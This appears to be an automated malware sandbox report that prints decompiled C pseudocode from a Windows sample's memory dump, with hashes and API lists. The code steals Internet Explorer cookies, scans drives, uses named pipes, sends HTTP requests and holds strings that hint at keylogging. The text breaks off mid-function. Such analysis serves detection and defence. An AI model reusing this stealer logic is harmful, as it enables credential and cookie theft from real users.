        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: closesocket$CountExitObjectSingleThreadTickUserWaitacceptbindgetsocknamelistenselectsocket
        • String ID: atorA
        • API String ID: 1067960629-3648288836
        • Opcode ID: f565c23cd2c9270926fc16f2da1049be0ff06bbe74df269502180013479bae07
        • Instruction ID: ba1636c0d4c5ff6d05124c7d3a83ea0720aeacb155258f12bb8462978c2da3aa
        • Opcode Fuzzy Hash: f565c23cd2c9270926fc16f2da1049be0ff06bbe74df269502180013479bae07
        • Instruction Fuzzy Hash: 4C41B072900518AFDB109FA9DC889EE7778FF88354F11453AE815F22D1E3794D458B98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411F19(intOrPtr _a4, char _a7, intOrPtr _a8, void** _a12) {
        				long _v8;
        				struct _OVERLAPPED* _v12;
        				void _v16;
        				char _v518;
        				short _v536;
        				intOrPtr* _t28;
        				int _t35;
        				void** _t54;
        				void* _t61;
        				void* _t66;
        
        				_t28 = _a12;
        				if(_t28 != 0) {
        					 *_t28 = 0;
        				}
        				E0040F19A( &_v536, L"\\\\.\\pipe\\", 0x12);
        				_v518 = 0;
        				E0040F2AA(0xffffffff, _a4,  &_v518);
        				_a7 = 0;
        				while(1) {
        					_t35 = CreateFileW( &_v536, 0xc0000000, 3, 0, 3, 0, 0);
        					_t61 = _t35;
        					if(_t61 != 0xffffffff) {
        						break;
        					}
        					if(_a7 == 1) {
        						L14:
        						return _t35;
        					}
        					WaitNamedPipeW( &_v536, 0xffffffff);
        					_a7 = _a7 + 1;
        				}
        				_v8 = 2;
        				if(SetNamedPipeHandleState(_t61,  &_v8, 0, 0) == 0) {
        					L13:
        					_t35 = CloseHandle(_t61);
        					goto L14;
        				}
        				_v16 = _a8;
        				_v12 = 0;
        				if(WriteFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || ReadFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || _v8 != 8) {
        					goto L13;
        				} else {
        					_t48 =  &(_v12->Internal);
        					if( &(_v12->Internal) != 0) {
        						_t66 = E0040F14B(_t48);
        						if(_t66 == 0 || ReadFile(_t61, _t66, _v12,  &_v8, 0) == 0 || _v12 != _v8) {
        							L12:
        							E0040F15E(_t66);
        						} else {
        							_t54 = _a12;
        							if(_t54 != 0) {
        								 *_t54 = _t66;
        							}
        						}
        						goto L13;
        					}
        					_t66 = 0;
        					goto L12;
        				}
        			}

        APIs
        • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411F7A
        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,004040BC,00000000), ref: 00411F92
        • SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411FAD
        • WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FCC
        • ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411FE2
        • CloseHandle.KERNEL32(00000000), ref: 00412003
        • ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00412025
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$HandleNamedPipeRead$CloseCreateStateWaitWrite
        • String ID: \\.\pipe\
        • API String ID: 223520675-91387939
        • Opcode ID: 333c9014d26c880eb3c1fe1abc07d69c8a3bb24170e61119fc5089765fa7e023
        • Instruction ID: 2367e7ad7dab588756f6e2333cf80714741152095c4ab82e5a22b9ab975fea82
        • Opcode Fuzzy Hash: 333c9014d26c880eb3c1fe1abc07d69c8a3bb24170e61119fc5089765fa7e023
        • Instruction Fuzzy Hash: 9C318D72500218AFDB21DFA4CD89EEF7BBCAB45354F008576F615E6190D7B48E85CB28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 92%
        			E00404EA2(void* __ecx, signed int* __edi, signed char _a4, signed int* _a8) {
        				signed int _v528;
        				short _v536;
        				intOrPtr _v540;
        				long _v544;
        				char _v545;
        				intOrPtr _v548;
        				intOrPtr _v552;
        				void* _v556;
        				char _v557;
        				void* _v560;
        				intOrPtr _v561;
        				intOrPtr _v564;
        				long _v568;
        				signed int _t35;
        				void* _t39;
        				signed int _t55;
        				intOrPtr _t70;
        				signed int* _t71;
        				struct _GOPHER_FIND_DATAA _t73;
        
        				_t71 = __edi;
        				_t66 = __ecx;
        				_t35 = _a4 & 0x00000001;
        				_v528 = _t35;
        				if(_t35 != 0) {
        					 *_a8 =  *_a8 & 0x00000000;
        					 *__edi =  *__edi & 0x00000000;
        				}
        				_v545 = 1;
        				_t73 = E0040F14B(0x1000);
        				_v544 = 0x1000;
        				 *_t73 = 0x50;
        				_t39 = FindFirstUrlCacheEntryW(L"cookie:", _t73,  &_v544);
        				_v544 = _t39;
        				if(_t39 == 0) {
        					L14:
        					E0040F15E(_t73);
        					return _v561;
        				} else {
        					do {
        						_t81 = _v540;
        						if(_v540 == 0) {
        							__eflags = _a4 & 0x00000002;
        							if(__eflags == 0) {
        								 *0x414b48( *((intOrPtr*)(_t73 + 4)));
        							} else {
        								PathCombineW( &_v536, L"ie_cookies", PathFindFileNameW( *(_t73 + 8)));
        								E00413599(_t66, _t70, __eflags,  *(_t73 + 8), 0,  &_v544);
        							}
        							goto L10;
        						}
        						_t66 = E00404D44(_t66, _t81,  *(_t73 + 8));
        						_v556 = _t66;
        						if(_t66 == 0) {
        							goto L10;
        						}
        						_v548 = E0040F637(_t66);
        						_t55 = E0040F117( *_t71 + _v548,  *_a8);
        						if(_t55 == 0) {
        							_v557 = 0;
        							E0040F15E(_v552);
        							E0040F15E( *_a8);
        							L13:
        							FindCloseUrlCache(_v560);
        							goto L14;
        						}
        						_t70 = _v548;
        						 *_a8 = _t55;
        						_t66 =  *_t71 + _t55;
        						E0040F19A( *_t71 + _t55, _v552, _t70);
        						 *_t71 =  *_t71 + _t70;
        						E0040F15E(_v564);
        						L10:
        						_v560 = 0x1000;
        						 *_t73 = 0x50;
        						E0040F20A(_t73, 0x1000);
        					} while (FindNextUrlCacheEntryW(_v556, _t73,  &_v568) != 0);
        					goto L13;
        				}
        			}

        APIs
        • FindFirstUrlCacheEntryW.WININET(cookie:,00000000,?), ref: 00404EED
        • PathFindFileNameW.SHLWAPI(?), ref: 00404F6B
        • PathCombineW.SHLWAPI(?,ie_cookies,00000000), ref: 00404F7C
        • DeleteUrlCacheEntryW.WININET(?), ref: 00404F96
        • FindNextUrlCacheEntryW.WININET(?,00000000,?), ref: 00404FB7
        • FindCloseUrlCache.WININET(?), ref: 00404FE3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CacheFind$Entry$Path$CloseCombineDeleteFileFirstNameNext
        • String ID: cookie:$ie_cookies
        • API String ID: 468235262-2556801673
        • Opcode ID: e1b0951da6e20bdc73e7b5051e233c88f39d68b7a510ebff04a43dcf9728c26b
        • Instruction ID: 0dbd61b364be1afa4da7cf897d3fe2c6a5dce73051ca318ceb383ca2977cfdd4
        • Opcode Fuzzy Hash: e1b0951da6e20bdc73e7b5051e233c88f39d68b7a510ebff04a43dcf9728c26b
        • Instruction Fuzzy Hash: 9D4181B1108342EFC710AF65C845B5BBBE4BF84308F00883EF995A66A1D739D954CB96
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 71%
        			E00409EBA(char _a4) {
        				char _v9;
        				char _v16;
        				char _v416;
        				intOrPtr _t19;
        				intOrPtr _t20;
        				void* _t23;
        				char _t28;
        				signed char _t34;
        				void* _t40;
        				void* _t45;
        				void* _t48;
        
        				_t19 =  *0x414b7c; // 0x418000
        				_t1 = _t19 + 0x26; // 0x200001a
        				_t2 = _t19 + 0x24; // 0x1a001e
        				_t40 = ( *_t1 & 0x000000ff) + _t19;
        				_t3 = _t19 + 0x25; // 0x1a00
        				_t20 =  *_t3;
        				_t5 = _t40 + 0x12c; // 0x1a014a
        				_t45 = ( *_t2 & 0x000000ff) + _t5;
        				_t41 = 0;
        				_v9 = 0;
        				if(_t20 > 0) {
        					while(1) {
        						_t48 =  *((intOrPtr*)(_t45 + (_t41 & 0x000000ff) * 2)) -  *0x414b64; // 0x409
        						if(_t48 == 0) {
        							break;
        						}
        						_t41 = _t41 + 1;
        						if(_t41 < _t20) {
        							continue;
        						} else {
        						}
        						goto L5;
        					}
        					_v9 = 1;
        				}
        				L5:
        				L00404155();
        				 *0x414ed4("mID");
        				 *0x414a2c =  *0x414a2c + 1;
        				_t23 = E0040B81A(_t41, E00404566, 0x4147a2);
        				if(_v9 == 0) {
        					E00409D7D();
        					 *0x414cd4(0x202,  &_v416);
        					 *0x414a2c =  *0x414a2c + 1;
        					E0040B81A(_t41, E004094DE, 0);
        					_t28 =  *0x414a30; // 0x2210041
        					_v16 = _t28;
        					E004131E7();
        					 *0x414a2c =  *0x414a2c + 1;
        					E0040B81A(_t41, E00409B83, 0x4147a2);
        					 *0x414a2c =  *0x414a2c + 1;
        					 *0x414ed4("pVirtualKeyExA", _a4,  &_v16);
        					 *0x414a2c =  *0x414a2c + 1;
        					 *0x41477c = 0;
        					 *0x414778 = 0;
        					_a4 = 0;
        					_t34 = E004089BF( &_a4, _t41, 0, "PopOpO03-3331111");
        					_t51 = _t34;
        					if(_t34 != 0) {
        						_t41 = _t34;
        						E00404BB0(_a4, _t34, _t51);
        						E0040F15E(_a4);
        					}
        					_t23 = E0040B81A(_t41, E00404AE9, "atorA");
        					if(_t23 != 0) {
        						 *0x414a2c =  *0x414a2c - 1;
        						return _t23;
        					}
        				}
        				return _t23;
        			}

        APIs
        • RtlInitializeCriticalSection.NTDLL(mID), ref: 00409F0F
        • WSAStartup.WS2_32(00000202,?), ref: 00409F45
        • RtlInitializeCriticalSection.NTDLL(pVirtualKeyExA), ref: 00409F8C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalInitializeSection$Startup
        • String ID: PopOpO03-3331111$atorA$mID$pVirtualKeyExA$ryStringW
        • API String ID: 100036477-3181093921
        • Opcode ID: 62d89d21265509a90513e9c91e3d6b4f32a397d77a30ef88d652db42a77146e3
        • Instruction ID: 3a7d11628b0fedcfdf00002fd124bfa51147fc8327f54dfd2345d0619440542b
        • Opcode Fuzzy Hash: 62d89d21265509a90513e9c91e3d6b4f32a397d77a30ef88d652db42a77146e3
        • Instruction Fuzzy Hash: B631B672640204ABC7016FE5DC81DEA7BB9EF89341B01C07BF555A62E3D7788941CB5D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00404AE9(intOrPtr* _a4) {
        				short _v14;
        				short _v16;
        				short _v18;
        				short _v20;
        				long _v24;
        				short _t23;
        				short _t24;
        				int _t27;
        				signed char _t33;
        				intOrPtr* _t42;
        
        				SetThreadPriority(GetCurrentThread(), 0xfffffff1);
        				_t42 = _a4;
        				while(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
        					if( *0x414778 != 0) {
        						_v24 = GetLogicalDrives();
        						_t33 = 2;
        						do {
        							if((_v24 & 1 << _t33) == 0) {
        								goto L7;
        							} else {
        								_v20 = (_t33 & 0x000000ff) + 0x41;
        								_t23 = 0x3a;
        								_v18 = _t23;
        								_t24 = 0x5c;
        								_v16 = _t24;
        								_v14 = 0;
        								_t27 = GetDriveTypeW( &_v20);
        								if(_t27 == 3 || _t27 == 2) {
        									E004048AC( &_v20, _t42);
        									if(WaitForSingleObject( *(_t42 + 4), 0x2710) != 0) {
        										goto L7;
        									}
        								} else {
        									goto L7;
        								}
        							}
        							goto L9;
        							L7:
        							_t33 = _t33 + 1;
        						} while (_t33 < 0x20);
        					}
        				}
        				L9:
        				 *_t42 =  *_t42 - 1;
        				_push(0);
        				return RtlExitUserThread();
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 00404AF7
        • SetThreadPriority.KERNEL32(00000000), ref: 00404AFE
        • GetLogicalDrives.KERNEL32 ref: 00404B17
        • GetDriveTypeW.KERNEL32(?), ref: 00404B5B
        • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404B7A
        • WaitForSingleObject.KERNEL32(?,00002710), ref: 00404B8F
        • RtlExitUserThread.NTDLL(00000000), ref: 00404BA1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Thread$ObjectSingleWait$CurrentDriveDrivesExitLogicalPriorityTypeUser
        • String ID: ryStringW
        • API String ID: 97270378-1359682944
        • Opcode ID: 39f8447d1111619beef7cd5d6b58bc9344308288afb233aeb469486f680bb3df
        • Instruction ID: cdb096cdea3e56584862f1877e83bea784b41d171cfcc808254d0d34786fc7e4
        • Opcode Fuzzy Hash: 39f8447d1111619beef7cd5d6b58bc9344308288afb233aeb469486f680bb3df
        • Instruction Fuzzy Hash: 2A11AE721142009BD720ABB4EC09B9777B8EFC0722F10893AF955D22E0D738D844CBAA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FB26(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
        				long _t19;
        				void* _t21;
        				char* _t27;
        				void* _t29;
        
        				_t19 = 0x8404f300;
        				if((_a20 & 0x00000002) != 0) {
        					_t19 = 0x8444f300;
        				}
        				if((_a20 & 0x00000004) != 0) {
        					_t19 = _t19 | 0x00800000;
        				}
        				_t27 = "POST";
        				if((_a20 & 0x00000001) == 0) {
        					_t27 = "GET";
        				}
        				_t29 = HttpOpenRequestA(_a4, _t27, _a8, "HTTP/1.1", 0, "�?@", _t19, 0);
        				if(_t29 == 0) {
        					L12:
        					_t21 = 0;
        				} else {
        					if(HttpSendRequestA(_t29, 0, 0, _a12, _a16) == 0) {
        						L11:
        						InternetCloseHandle(_t29);
        						goto L12;
        					} else {
        						_a20 = 0;
        						_a8 = 4;
        						if(HttpQueryInfoA(_t29, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
        							goto L11;
        						} else {
        							_t21 = _t29;
        						}
        					}
        				}
        				return _t21;
        			}








        APIs
        • HttpOpenRequestA.WININET(?,POST,00000000,HTTP/1.1,00000000,?@,8404F300,00000000), ref: 0040FB6C
        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040FB81
        • HttpQueryInfoA.WININET(00000000,20000013,00000001,00000000,00000000), ref: 0040FBA4
        • InternetCloseHandle.WININET(00000000), ref: 0040FBBC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
        • String ID: GET$HTTP/1.1$POST$?@
        • API String ID: 3080274660-1836395888
        • Opcode ID: 341dcc06ba2eddd648576a271ae9f5a28be8a0538efa2b3f1a56577f713ec8e3
        • Instruction ID: 9737bc1cec33add7b11a0ab3dd2fb0794f81c36a62b024b0710f594c5e54eb61
        • Opcode Fuzzy Hash: 341dcc06ba2eddd648576a271ae9f5a28be8a0538efa2b3f1a56577f713ec8e3
        • Instruction Fuzzy Hash: 86115471200119AADB318F51DC58FEB3EADDF95794F108036FE05A15D0D6B8E958CBE8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407C9A(void* __ecx, void* __edi, intOrPtr _a4, int _a7) {
        				int _v12;
        				long _v16;
        				void* _v20;
        				short _v544;
        				short _v1064;
        				void* _t26;
        				void* _t41;
        				int _t44;
        				void* _t45;
        				void* _t46;
        
        				_t46 = __edi;
        				_t45 = __ecx;
        				E0040B058(__edi, _a4, 1,  &_v544);
        				E0040B058(__edi, _a4, 2,  &_v1064);
        				_t44 = 0;
        				_t26 = OpenMutexW(0x1f0001, 0,  &_v1064);
        				if(_t26 == 0) {
        					_t26 = OpenMutexW(0x1f0001, 0,  &_v544);
        					if(_t26 != 0) {
        						goto L1;
        					}
        					_v20 = CreateMutexW(0x4155b4, 1,  &_v544);
        					if(E00407DA0(__edi, _t45, 0x405b75 -  *0x414ca0, 0) != 0) {
        						_a7 = 1;
        						_v16 = 0;
        						_v12 = 0;
        						while(GetExitCodeProcess(_t46,  &_v16) != 0) {
        							if(_v16 != 0x103) {
        								L15:
        								_t44 = _a7;
        								goto L5;
        							}
        							_t41 = OpenMutexW(0x1f0001, _t44,  &_v1064);
        							if(_t41 != _t44) {
        								CloseHandle(_t41);
        								goto L15;
        							}
        							_v12 = _v12 + 1;
        							if(_v12 > 0x1f4) {
        								_a7 = _t44;
        								goto L15;
        							}
        							Sleep(0x14);
        						}
        						goto L15;
        					}
        					L5:
        					CloseHandle(_v20);
        					return _t44;
        				}
        				L1:
        				CloseHandle(_t26);
        				return 0;
        			}














        APIs
          • Part of subcall function 0040B058: GetProcessTimes.KERNEL32(00000002,00000002,?,?,?,?,?,?,?,?,00405842,00000002,?), ref: 0040B071
          • Part of subcall function 0040B058: wnsprintfW.SHLWAPI ref: 0040B093
        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00407CD9
        • CloseHandle.KERNEL32(00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407CE4
        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,00000002,?,?,?,00000001,?), ref: 00407CFB
        • CreateMutexW.KERNEL32(004155B4,00000001,?,?,?,00000002,?,?,?,00000001,?), ref: 00407D13
        • CloseHandle.KERNEL32(?,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D37
        • OpenMutexW.KERNEL32(001F0001,00000000,?,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D5F
        • Sleep.KERNEL32(00000014,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D78
        • GetExitCodeProcess.KERNEL32(?,?), ref: 00407D83
        • CloseHandle.KERNEL32(00000000,?,?,-0000F12B,00000000,?,?,00000002,?,?,?,00000001,?), ref: 00407D90
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Mutex$CloseHandleOpen$Process$CodeCreateExitSleepTimeswnsprintf
        • String ID:
        • API String ID: 3355469312-0
        • Opcode ID: d30571f83592f7c60a62f0c3bd1773634b04f348685885d61a9388639b605636
        • Instruction ID: 7ab6b212f595fd8f1a556c67e2a1347ecc942016070378ad47a6102b765a2f41
        • Opcode Fuzzy Hash: d30571f83592f7c60a62f0c3bd1773634b04f348685885d61a9388639b605636
        • Instruction Fuzzy Hash: A8315AB1944108AFDF109B90AC88AFE7BBDEF45304F508077F605E2191D738AA458B6A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 97%
        			E0040E503(void* __ecx, void* _a16, int _a20) {
        				signed int _v8;
        				char _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				void _v24;
        				intOrPtr _v36;
        				char* _v40;
        				intOrPtr _v64;
        				char* _v68;
        				void* _v84;
        				struct tagMSG _v112;
        				char _v372;
        				char _v1396;
        				void* __ebx;
        				void* __edi;
        				char* _t53;
        				void* _t65;
        				void* _t86;
        				void* _t90;
        				signed int _t91;
        				int _t94;
        
        				_v8 = _v8 | 0xffffffff;
        				_t90 = 0x3c;
        				E0040F21C( &_v84,  &_v84, 0, _t90);
        				E0040F21C( &_v372,  &_v372, 0, 0x104);
        				E0040F21C( &_v1396,  &_v1396, 0, 0x400);
        				_t94 = _a20;
        				_v68 =  &_v372;
        				_v40 =  &_v1396;
        				_t53 = ( *(_t94 + 6) & 0x0000ffff) + _t94;
        				_v84 = _t90;
        				_v64 = 0x103;
        				_v36 = 0x3ff;
        				_a20 = 0;
        				if(( *(_t94 + 2) & 0x00000004) != 0) {
        					_t53 = E0040C6FE(__ecx, ( *(_t94 + 4) & 0x0000ffff) + _t94, _t53, _a16);
        					_a20 = _t53;
        				}
        				if(InternetCrackUrlA(_t53, 0, 0,  &_v84) == 0) {
        					L14:
        					E0040F15E(_a20);
        					return _v8;
        				}
        				_push( *((intOrPtr*)(_a16 + 0x420)));
        				_t86 = 2;
        				_t91 = E0040CCAB(_t86);
        				if(_t91 == 0xffffffff) {
        					goto L14;
        				}
        				_v24 = _a16;
        				_v16 =  &_v84;
        				_v20 = _t91 * 0x30 +  *0x414f5c;
        				_v12 = 0;
        				_t65 = CreateThread(0, 0, E0040E312,  &_v24, 0, 0);
        				_a16 = _t65;
        				if(_t65 == 0) {
        					L10:
        					if(_v12 != 1) {
        						E0040CD37(_t91, 0, _t91);
        					} else {
        						_v8 = 1;
        						if( *(_t94 + 0xc) > 0) {
        							E0040F15E( *0x414f60);
        							E0040F15E( *0x414f64);
        							 *0x414f60 = E0040F346(( *(_t94 + 0xc) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 0xc) & 0x0000ffff) + _t94);
        							 *0x414f64 = E0040F346(( *(_t94 + 4) & 0x0000ffff) + _t94 | 0xffffffff, ( *(_t94 + 4) & 0x0000ffff) + _t94);
        						}
        					}
        					goto L14;
        				}
        				L7:
        				while(PeekMessageW( &_v112, 0, 0, 0, 1) != 0) {
        					DispatchMessageW( &_v112);
        				}
        				if(MsgWaitForMultipleObjects(1,  &_a16, 0, 0xffffffff, 0x4bf) != 0) {
        					goto L7;
        				}
        				CloseHandle(_a16);
        				goto L10;
        			}

























        APIs
        • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040E595
        • CreateThread.KERNEL32(00000000,00000000,Function_0000E312,?,00000000,00000000), ref: 0040E5EB
        • DispatchMessageW.USER32(?), ref: 0040E5FE
          • Part of subcall function 0040CD37: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E692), ref: 0040CD4D
          • Part of subcall function 0040CD37: CloseHandle.KERNEL32(?), ref: 0040CD56
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDBA
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDC3
          • Part of subcall function 0040CD37: InternetCloseHandle.WININET(?), ref: 0040CDCC
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E60D
        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040E625
        • CloseHandle.KERNEL32(?), ref: 0040E632
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$Internet$MessageWait$CrackCreateDispatchMultipleObjectObjectsPeekSingleThread
        • String ID: eateProcessAsUserA
        • API String ID: 646759295-3969283286
        • Opcode ID: 7555143c17019bd1f0b22a36fbd8fa01b790a4a502f8feecfa2f9fe9e1a2fe5a
        • Instruction ID: 0a875fecdd23d4a8ba547816b9739846714ce969b466246a18ab09921baed198
        • Opcode Fuzzy Hash: 7555143c17019bd1f0b22a36fbd8fa01b790a4a502f8feecfa2f9fe9e1a2fe5a
        • Instruction Fuzzy Hash: 0841AEB1900208EBDB209FE5DC85AEF7BBCBB44354F00893AF515A62D0E73999148B68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00409B83(intOrPtr __ecx) {
        				char* _v8;
        				intOrPtr _v12;
        				void* _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				void* __ebx;
        				void* __esi;
        				intOrPtr _t29;
        				void* _t32;
        				intOrPtr* _t33;
        				intOrPtr* _t36;
        				intOrPtr _t42;
        				intOrPtr _t43;
        				intOrPtr _t46;
        				char _t49;
        				char* _t54;
        				intOrPtr _t56;
        				char* _t58;
        				signed char _t60;
        				char* _t61;
        				signed char _t62;
        				intOrPtr* _t65;
        				intOrPtr _t70;
        				void* _t71;
        
        				_t57 = __ecx;
        				 *0x414a10 =  *0x414a10 & 0x00000000;
        				 *0x414a0c =  *0x414a0c & 0x00000000;
        				 *0x414ed4("tate");
        				if(WaitForSingleObject( *0x414a30, 0xea60) == 0x102) {
        					do {
        						_t29 = E004089BF( &_v16, _t57, 0, "!213KJhndkmnihjd");
        						_t61 = _v16;
        						if(_t61 != 0 && _t29 > 5) {
        							_t57 = _t29;
        							_t32 = E0040F94A(_t61, _t29);
        							_t77 = _t32;
        							if(_t32 != 0) {
        								_v8 = _t61;
        								do {
        									_t54 = _v8;
        									__eflags =  *_t54;
        									_t58 = _t54;
        									if( *_t54 != 0) {
        										while(1) {
        											_t49 =  *_t58;
        											_t58 = _t58 + 1;
        											__eflags = _t49 - 0x7c;
        											if(_t49 == 0x7c) {
        												goto L10;
        											}
        											__eflags =  *_t58;
        											if( *_t58 != 0) {
        												continue;
        											}
        											goto L10;
        										}
        									}
        									L10:
        									__eflags =  *_t58;
        									if( *_t58 != 0) {
        										_v20 = E004102D2(_t58, E0040F637(_t58));
        										_t36 = E0040979F(_t35);
        										__eflags = _t36;
        										if(_t36 == 0) {
        											_t65 = RtlAllocateHeap( *0x415fa8, 8, 0x14);
        											__eflags = _t65;
        											if(_t65 != 0) {
        												_v12 = E0040F637(_t54);
        												_t70 = E0040F346(_t38, _t54);
        												_t60 = 0;
        												__eflags = _t70;
        												if(_t70 == 0) {
        													L24:
        													E0040F15E(_t65);
        												} else {
        													_t62 = 0;
        													__eflags = _v12;
        													if(_v12 <= 0) {
        														L23:
        														E0040F15E(_t70);
        														goto L24;
        													} else {
        														do {
        															__eflags =  *((char*)(_t60 + _t70)) - 0x7c;
        															if( *((char*)(_t60 + _t70)) != 0x7c) {
        																goto L18;
        															} else {
        																_t10 = _t70 + 1; // 0x1
        																_t42 = _t60 + _t10;
        																 *((char*)(_t60 + _t70)) = 0;
        																 *((intOrPtr*)(_t71 + (_t62 & 0x000000ff) * 4 - 0x18)) = _t42;
        																__eflags = _t42;
        																if(_t42 == 0) {
        																	break;
        																} else {
        																	_t62 = _t62 + 1;
        																	__eflags = _t62 - 2;
        																	if(_t62 == 2) {
        																		L20:
        																		_t56 = _v20;
        																		_t43 = E004097DF(_t56);
        																		__eflags = _t43;
        																		if(_t43 == 0) {
        																			goto L23;
        																		} else {
        																			 *((intOrPtr*)(_t65 + 4)) = _v28;
        																			 *_t65 = _t70;
        																			 *((intOrPtr*)(_t65 + 8)) = _v24;
        																			 *((intOrPtr*)(_t65 + 0xc)) = _t56;
        																			 *0x414a2c =  *0x414a2c + 1;
        																			_t46 = E0040B81A(_t60, E00409B50, _t65);
        																			__eflags = _t46;
        																			if(_t46 <= 0) {
        																				 *0x414a2c =  *0x414a2c - 1;
        																				__eflags =  *0x414a2c;
        																				E0040987D(_t56);
        																				goto L23;
        																			}
        																		}
        																	} else {
        																		goto L18;
        																	}
        																}
        															}
        															goto L25;
        															L18:
        															_t60 = _t60 + 1;
        															__eflags = _t60 - _v12;
        														} while (_t60 < _v12);
        														__eflags = _t62 - 2;
        														if(_t62 != 2) {
        															goto L23;
        														} else {
        															goto L20;
        														}
        													}
        												}
        											}
        										}
        									}
        									L25:
        									_t57 = _v8;
        									_t33 = E0040F968(_v8, 1);
        									_v8 = _t33;
        									__eflags = _t33;
        								} while (_t33 != 0);
        							} else {
        								E00408AA6(_t77, 0, "!213KJhndkmnihjd");
        							}
        							E0040F15E(_v16);
        						}
        					} while (WaitForSingleObject( *0x414a30, 0xea60) == 0x102);
        				}
        				 *0x414a2c =  *0x414a2c - 1;
        				return 0;
        			}





























        APIs
        • RtlInitializeCriticalSection.NTDLL(tate), ref: 00409B9C
        • WaitForSingleObject.KERNEL32(0000EA60), ref: 00409BAD
        • RtlAllocateHeap.NTDLL(00000008,00000014), ref: 00409C49
        • WaitForSingleObject.KERNEL32(0000EA60,00000000,!213KJhndkmnihjd), ref: 00409D16
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ObjectSingleWait$AllocateCriticalHeapInitializeSection
        • String ID: !213KJhndkmnihjd$atorA$eyboardState
        • API String ID: 2333182645-3632419595
        • Opcode ID: 8374f8e74daedc07cf7062891cda39f609523db0bf1aaca67eab7a6dcdc3b20b
        • Instruction ID: 1c7921983c44daa79f4d83fa86534b283f83a35d2151dd0700fe9caf23643b27
        • Opcode Fuzzy Hash: 8374f8e74daedc07cf7062891cda39f609523db0bf1aaca67eab7a6dcdc3b20b
        • Instruction Fuzzy Hash: A541C070E48205AAEB20AF65D886BAE77A5BF81344F10807BE402B76D3D77D9D41879C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E00406CA1(void* __ecx, void* __edx, signed int* _a4) {
        				void* __edi;
        				void* __esi;
        				intOrPtr _t16;
        				_Unknown_base(*)()* _t17;
        				char* _t19;
        				void* _t23;
        				void* _t28;
        				void* _t31;
        				intOrPtr _t34;
        				intOrPtr _t37;
        				void* _t43;
        				signed int* _t45;
        
        				_t41 = __ecx;
        				_t43 = __edx;
        				if(__ecx == 1) {
        					 *_a4 =  *_a4 & 0x00000000;
        					return 0x1020716;
        				}
        				if(__ecx != 2) {
        					if(__ecx != 3) {
        						if(__ecx != 4) {
        							if(__ecx != 5) {
        								if(__ecx != 6) {
        									if(__ecx != 7) {
        										if(__ecx != 8) {
        											if(__ecx != 0xa) {
        												if(__ecx != 9) {
        													if(__ecx != 0xb) {
        														if(__ecx != 0xc) {
        															if(__ecx != 0xd) {
        																if(__ecx != 0xe) {
        																	L6:
